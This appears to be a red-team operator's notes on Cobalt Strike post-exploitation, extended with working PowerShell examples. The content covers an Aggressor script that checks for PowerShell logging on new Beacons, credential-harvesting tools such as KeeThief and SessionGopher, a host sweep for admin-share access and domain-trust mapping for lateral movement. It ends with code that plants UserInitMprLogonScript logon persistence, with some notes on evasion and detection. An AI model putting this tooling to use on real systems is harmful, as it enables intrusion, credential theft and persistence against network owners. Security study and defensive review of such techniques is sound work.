Initial Access / Aggressors

Try to get Cobalt Strike to load against 127.0.0.2

PowerShell:

Try to stick to powerpick (unmanaged PowerShell in a spawned process, no powershell.exe) and set a spoofed parent with ppid

Aggressor script to check for PowerShell logging (transcription, script block logging, module logging) when a new Beacon checks in. Note that powerpick only avoids powershell.exe; script block and module logging still apply to the runspace it creates, so knowing what is on matters:

on beacon_initial {
    # check whether the PowerShell logging policies are enabled (value 1 = on; a key that exists with 0 is off)
    blog($1, "Checking for PowerShell Transcription");
    bpowerpick($1, 'if((Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription" -ErrorAction SilentlyContinue).EnableTranscription -eq 1) {Write-Output "PowerShell Transcription is Enabled!" }');

    blog($1, "Checking for PowerShell Script Block Logging");
    bpowerpick($1, 'if((Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1) {Write-Output "PowerShell Script Block Logging is Enabled!" }');

    blog($1, "Checking for PowerShell Module Logging");
    bpowerpick($1, 'if((Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -ErrorAction SilentlyContinue).EnableModuleLogging -eq 1) {Write-Output "PowerShell Module Logging is Enabled!" }');
}
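Added example (not from the original notes): a single PowerShell function that does the same three checks in one powerpick run and returns objects instead of strings. PowerShell itself reads the policy from HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell, so this checks that path as well as the Wow6432Node path the notes use, and it also pulls the transcript output directory and the module name list, which tell you what is actually being captured. The assumption that a DWORD of 1 means enabled matches how Group Policy writes these values.

```powershell
# Added example: enumerate PowerShell logging policy from both policy paths.
# Assumptions: Group Policy writes the well-known subkeys below; 1 = enabled.
function Get-PSLoggingPolicy {
    [CmdletBinding()]
    param()

    $bases = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell',             # what PowerShell reads
        'HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell'  # 32-bit view, as in the notes
    )
    # subkey -> the DWORD that switches the feature on
    $checks = [ordered]@{
        'Transcription'      = 'EnableTranscription'
        'ScriptBlockLogging' = 'EnableScriptBlockLogging'
        'ModuleLogging'      = 'EnableModuleLogging'
    }

    foreach ($base in $bases) {
        foreach ($sub in $checks.Keys) {
            $path  = Join-Path $base $sub
            $name  = $checks[$sub]
            $props = Get-ItemProperty -Path $path -ErrorAction SilentlyContinue
            $value = if ($props) { $props.$name } else { $null }
            $detail = $null
            if ($props -and $sub -eq 'Transcription') {
                # where transcripts land; empty means the user's Documents folder
                $detail = $props.OutputDirectory
            }
            if ($props -and $sub -eq 'ModuleLogging') {
                # ModuleNames holds one value per logged module ("*" = everything)
                $mods = Get-ItemProperty -Path (Join-Path $path 'ModuleNames') -ErrorAction SilentlyContinue
                if ($mods) {
                    $detail = ($mods.PSObject.Properties |
                        Where-Object { $_.Name -notlike 'PS*' } |
                        ForEach-Object Name) -join ','
                }
            }
            [pscustomobject]@{
                Path    = $path
                Setting = $name
                Value   = $value
                Enabled = ($value -eq 1)
                Detail  = $detail
            }
        }
    }
}

# Run it and warn on anything enabled in either view
$policy = Get-PSLoggingPolicy
$policy | Format-Table -AutoSize
$policy | Where-Object Enabled | ForEach-Object {
    Write-Warning ("{0} is enabled via {1} {2}" -f $_.Setting, $_.Path, $_.Detail)
}
```

Even with no policy present, PowerShell 5 and later still writes 4104 events for script blocks it classifies as suspicious, so an all-clear from this function only means the full-coverage policies are off.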

Host Recon:

Think about running:

  • KeeThief / enumerate password managers

  • SessionGopher - pull saved sessions and passwords (PuTTY, WinSCP, FileZilla, SuperPuTTY, RDP)

  • SessionSearch

  • Invoke-ShareFinder | Invoke-ShareFinder -ExcludeStandard -NoPing -CheckShareAccess

  • Find interesting files | Find-InterestingFile -Path C:\Users\Admin -Terms local

  • Search for local admin access | Find-LocalAdminAccess or try dir \\host\C$
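Added example (not from the original notes): the "dir \\host\C$" check from the list above, done over a host list so the result is a table of where the current token has admin-share access. It is my code, not Find-LocalAdminAccess; the host names are constructed and the assumption is that the targets resolve and answer on 445. Directory.Exists is used instead of dir because it returns $false on access denied instead of throwing, and a short TCP probe keeps an unreachable host from stalling the loop.

```powershell
# Added example: test admin-share access (C$, ADMIN$) across a list of hosts.
# Assumptions: hostnames resolve, SMB/445 reachable; the host list is made up.
function Find-AdminShareAccess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string[]]$ComputerName,
        [string[]]$Share = @('C$', 'ADMIN$'),
        [int]$TimeoutMs = 2000
    )
    process {
        foreach ($h in $ComputerName) {
            # Cheap reachability check so dead hosts do not hang the SMB call.
            $up = $false
            $tcp = $null
            try {
                $tcp = New-Object System.Net.Sockets.TcpClient
                $ar  = $tcp.BeginConnect($h, 445, $null, $null)
                if ($ar.AsyncWaitHandle.WaitOne($TimeoutMs)) {
                    $tcp.EndConnect($ar)          # throws if refused
                    $up = $tcp.Connected
                }
            } catch {
                $up = $false
            } finally {
                if ($tcp) { $tcp.Close() }
            }
            if (-not $up) {
                [pscustomobject]@{ ComputerName = $h; Share = '-'; Access = $false; Note = 'no 445' }
                continue
            }
            foreach ($s in $Share) {
                $unc = "\\$h\$s"
                # Directory.Exists returns $false on access denied rather than throwing,
                # so it is the quiet equivalent of "dir \\host\C$".
                $ok = [System.IO.Directory]::Exists($unc)
                [pscustomobject]@{ ComputerName = $h; Share = $s; Access = $ok; Note = '' }
            }
        }
    }
}

# Constructed host list; in the field feed it the output of a computer enumeration instead
'ws01', 'ws02', 'srv-files' | Find-AdminShareAccess | Where-Object Access
```

Every probe is an SMB session on the target (4624 and 5140 on the host, plus a session on the DC if Kerberos is used), the same footprint as Find-LocalAdminAccess, so run it against a targeted list rather than the whole domain.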

Domain Trusts:

  • PowerView - Invoke-MapDomainTrust | Export-Csv -NoTypeInformation C:\Windows\Temp\trust.csv

  • DomainTrustExplorer parses the CSV and outputs a graphml file: https://github.com/sixdub/DomainTrustExplorer | python3 trust_explorer.py -f trust.csv -g

  • View the map in yEd
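Added example (my code, not DomainTrustExplorer): the same CSV-to-GraphML step done in PowerShell, so the trust map can be drawn on the target host or on a box without Python. It assumes the columns PowerView's Invoke-MapDomainTrust / Get-DomainTrust write (SourceName, TargetName, TrustType, TrustDirection); the sample rows are constructed. Direction is interpreted the way PowerView reports it, from the source domain's point of view, and each edge is drawn from the trusting domain to the trusted domain.

```powershell
# Added example: convert PowerView trust CSV rows into a GraphML file for yEd.
# Assumes columns SourceName, TargetName, TrustType, TrustDirection.
function Esc([string]$s) { [System.Security.SecurityElement]::Escape($s) }

function ConvertTo-TrustGraphml {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][psobject]$Trust,
        [Parameter(Mandatory)][string]$OutFile
    )
    begin { $rows = New-Object System.Collections.ArrayList }
    process { [void]$rows.Add($Trust) }
    end {
        $nodes = @{}
        $edges = @{}   # "from>to" -> trust type; dedupes the two rows of a bidirectional trust
        foreach ($r in $rows) {
            $src = $r.SourceName.ToLower(); $dst = $r.TargetName.ToLower()
            $nodes[$src] = $true; $nodes[$dst] = $true
            # Outbound: source trusts target. Inbound: target trusts source. Bidirectional: both.
            # Edge direction = trusting domain -> trusted domain.
            if ($r.TrustDirection -in 'Outbound', 'Bidirectional') { $edges["$src>$dst"] = $r.TrustType }
            if ($r.TrustDirection -in 'Inbound',  'Bidirectional') { $edges["$dst>$src"] = $r.TrustType }
        }

        $xml = New-Object System.Text.StringBuilder
        [void]$xml.AppendLine('<?xml version="1.0" encoding="UTF-8"?>')
        [void]$xml.AppendLine('<graphml xmlns="http://graphml.graphdrawing.org/xmlns">')
        [void]$xml.AppendLine('  <key id="label" for="all" attr.name="label" attr.type="string"/>')
        [void]$xml.AppendLine('  <graph id="trusts" edgedefault="directed">')
        foreach ($n in ($nodes.Keys | Sort-Object)) {
            [void]$xml.AppendLine(('    <node id="{0}"><data key="label">{0}</data></node>' -f (Esc $n)))
        }
        $i = 0
        foreach ($k in ($edges.Keys | Sort-Object)) {
            $from, $to = $k -split '>', 2
            $i++
            [void]$xml.AppendLine(('    <edge id="e{0}" source="{1}" target="{2}"><data key="label">{3}</data></edge>' -f `
                $i, (Esc $from), (Esc $to), (Esc $edges[$k])))
        }
        [void]$xml.AppendLine('  </graph>')
        [void]$xml.AppendLine('</graphml>')
        Set-Content -Path $OutFile -Value $xml.ToString() -Encoding UTF8

        [pscustomobject]@{ Nodes = $nodes.Count; Edges = $edges.Count; File = $OutFile }
    }
}

# Constructed sample in the layout PowerView writes. Real use:
#   Import-Csv C:\Windows\Temp\trust.csv | ConvertTo-TrustGraphml -OutFile trust.graphml
$sample = @'
SourceName,TargetName,TrustType,TrustDirection
corp.local,dev.corp.local,ParentChild,Bidirectional
dev.corp.local,corp.local,ParentChild,Bidirectional
corp.local,partner.example,External,Inbound
'@ | ConvertFrom-Csv
$sample | ConvertTo-TrustGraphml -OutFile "$env:TEMP\trust.graphml"
```

In yEd, open the file and use the Properties Mapper to bind the "label" data key to node and edge labels, then apply a hierarchical layout; an edge A -> B reads as "A trusts B", so an attacker who holds B can reach into A.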

Immediate Persistence:

UserInitMprLogonScript (HKCU\Environment\UserInitMprLogonScript, run by userinit.exe at the user's next interactive logon)
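Added example (not from the original notes): setting the value named above and, for the audit side, walking HKEY_USERS so the same check covers every loaded user hive. The payload path is a placeholder assumption; reading other users' hives requires admin.

```powershell
# Added example: plant and audit UserInitMprLogonScript.
# Assumption: the payload path below is a placeholder, not a real file.
function Set-UserInitLogonScript {
    param([Parameter(Mandatory)][string]$Command)
    # userinit.exe evaluates this per-user environment value at logon and runs it.
    Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' `
        -Value $Command -Type String
    (Get-ItemProperty -Path 'HKCU:\Environment').UserInitMprLogonScript
}

function Get-UserInitLogonScript {
    # Mount HKEY_USERS so hives of other logged-on users are checked too.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    Get-ChildItem -Path 'HKU:\' |
        Where-Object { $_.PSChildName -notlike '*_Classes' } |
        ForEach-Object {
            $envKey = Get-ItemProperty -Path "$($_.PSPath)\Environment" -ErrorAction SilentlyContinue
            if ($envKey -and $envKey.UserInitMprLogonScript) {
                [pscustomobject]@{
                    SID   = $_.PSChildName
                    Value = $envKey.UserInitMprLogonScript
                }
            }
        }
}

# Plant (placeholder path), then confirm it shows up in the audit view
Set-UserInitLogonScript -Command 'C:\Users\Public\update.bat'
Get-UserInitLogonScript
```

The write is a single registry value set, which is exactly what Sysmon Event ID 13 rules keyed on HKCU\Environment\UserInitMprLogonScript look for, so treat it as persistence that survives a reboot rather than as something quiet.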
